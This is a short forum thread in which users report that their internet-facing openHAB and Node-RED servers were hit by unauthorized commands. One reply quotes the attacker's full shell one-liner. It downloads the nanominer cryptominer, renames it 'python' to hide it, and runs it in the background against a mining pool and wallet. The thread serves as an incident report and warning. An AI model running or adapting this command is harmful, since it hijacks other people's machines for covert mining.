Openhab Servers potential target for attacs

Tailscale is a network overlay on top of Wireguard that does not require opening a port. Though to achieve that remote machines have to bounce their traffic through one of their Distributed Relay Servers, or enable UPnP on the router to allow Tailscale to dynamically open ports for the VPN. If using someone else’s service bothers you, you can run your own Headscale service but that’s getting into “need to know what you’re doing” territory more.

Just to let you know I got the same command run on my linode, I also hade node-red installed, but no openhab.

In addition to the ISIS file you mention in the op I had this one executed: (the server is down or file deleted)

h t t p : / /

Yeah, for me too, but some days later it was available:

mkdir -p /tmp/run/1/101/23/65/36 &&cd /tmp/run/1/101/23/65/36 && rm -rf nanominer-linux-3.6.8.tar.gz&& wget && tar xzvf nanominer-linux-3.6.8.tar.gz && cd nanominer-linux-3.6.8 && mv nanominer python&& nohup ./python -algo verushash -pool1 -wallet TL8914yZncYAriHHgaak6w8pNy4dRf8T88.$(echo $(wget -q -O -|sed -e 's/\.//g') -password c=TRX >/dev/null 2>&1 &

Seems they were testing out mining power as the script only run for some seconds…

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